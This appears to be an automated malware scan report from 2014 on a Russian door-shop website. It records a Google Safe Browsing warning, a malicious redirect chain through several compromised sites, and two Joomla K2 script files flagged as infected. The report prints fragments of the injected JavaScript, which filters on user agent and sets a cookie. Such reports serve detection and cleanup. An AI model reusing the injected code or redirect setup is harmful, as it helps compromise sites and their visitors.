Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dveri-motiv.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://dveri-motiv.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: dveri-motiv.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 25 Jun 2014 17:57:06 GMT Location: http://alfsystem.com.my/includes/domit/1.php Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html | malicious |
URL: http://alfsystem.com.my/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: alfsystem.com.my Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 25 Jun 2014 17:57:06 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.23 | malicious |
URL: http://www.csra.de/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: www.csra.de Referer: http://www.google.com/search?q=redirect+check3 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 25 Jun 2014 17:57:07 GMT Location: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.29 | malicious |
URL: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php (imitation of visitor from search engine) GET /components/com_user/views/login/tmpl/1/all3.php HTTP/1.1 Host: jbtconsultinggroup.com Referer: http://www.google.com/search?q=redirect+check4 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 25 Jun 2014 17:57:08 GMT Location: http://google.ru Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
Request | Server response | Status |
http://dveri-motiv.ru/ | 200 OK Content-Length: 23510 Content-Type: text/html | clean |
http://dveri-motiv.ru/media/system/js/modal.js | 200 OK Content-Length: 10588 Content-Type: application/javascript | clean |
http://dveri-motiv.ru/media/k2/assets/js/k2.noconflict.js | 200 OK Content-Length: 1977 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!ffff_listier_ua()) { var cookie = getCookie('mintfresh19he57be10lem8nes7ze16ne8human'); if (cookie == undefined) { setCookie('mintfresh19he57be10lem8nes7ze16ne8human', true, 86403); } } })(); var $K2 = jQuery.noConflict(); Antivirus reports:
| ||
http://dveri-motiv.ru/components/com_k2/js/k2.js | 200 OK Content-Length: 8953 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire $K2('.k2Scroller').css('width',($K2('.k2Scroller').find('.k2ScrollerElement:first').outerWidth(true))*$K2('.k2Scroller').children('.k2ScrollerElement').length); }); // Equal block heights for the "default" view $K2(window).load(function () { var blocks = $K2('.subCategory, .k2EqualHeights'); var maxHeight = 0; blocks.each(function(){ maxHeight = Math.max(maxHeight, parseInt($K2(this).css('height'))); }); blocks.css('height', maxHeight); }); Antivirus reports:
| ||
http://dveri-motiv.ru/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://dveri-motiv.ru/templates/rt_mixxmag_j15/js/rokutils-mt1.2.js | 200 OK Content-Length: 1814 Content-Type: application/javascript | clean |
http://dveri-motiv.ru/templates/rt_mixxmag_j15/js/rokmodtools-mt1.2.js | 200 OK Content-Length: 7787 Content-Type: application/javascript | clean |
http://dveri-motiv.ru/templates/rt_mixxmag_j15/js/rokmoomenu-mt1.2.js | 200 OK Content-Length: 4949 Content-Type: application/javascript | clean |
http://dveri-motiv.ru/templates/rt_mixxmag_j15/js/mootools.bgiframe.js | 200 OK Content-Length: 990 Content-Type: application/javascript | clean |
http://scripts.mycounter.ua/counter2.0.js | 200 OK Content-Length: 3543 Content-Type: application/javascript | clean |
http://dveri-motiv.ru/mgz-dveri | 200 OK Content-Length: 20439 Content-Type: text/html | clean |
http://dveri-motiv.ru/enrn | 200 OK Content-Length: 22275 Content-Type: text/html | clean |
http://dveri-motiv.ru/map-to-the-shop | 200 OK Content-Length: 13988 Content-Type: text/html | clean |
http://dveri-motiv.ru/-milyana | 200 OK Content-Length: 22712 Content-Type: text/html | clean |
http://dveri-motiv.ru/media/zoo/libraries/jquery/jquery.js?ver=20140330 | 200 OK Content-Length: 93244 Content-Type: application/javascript | clean |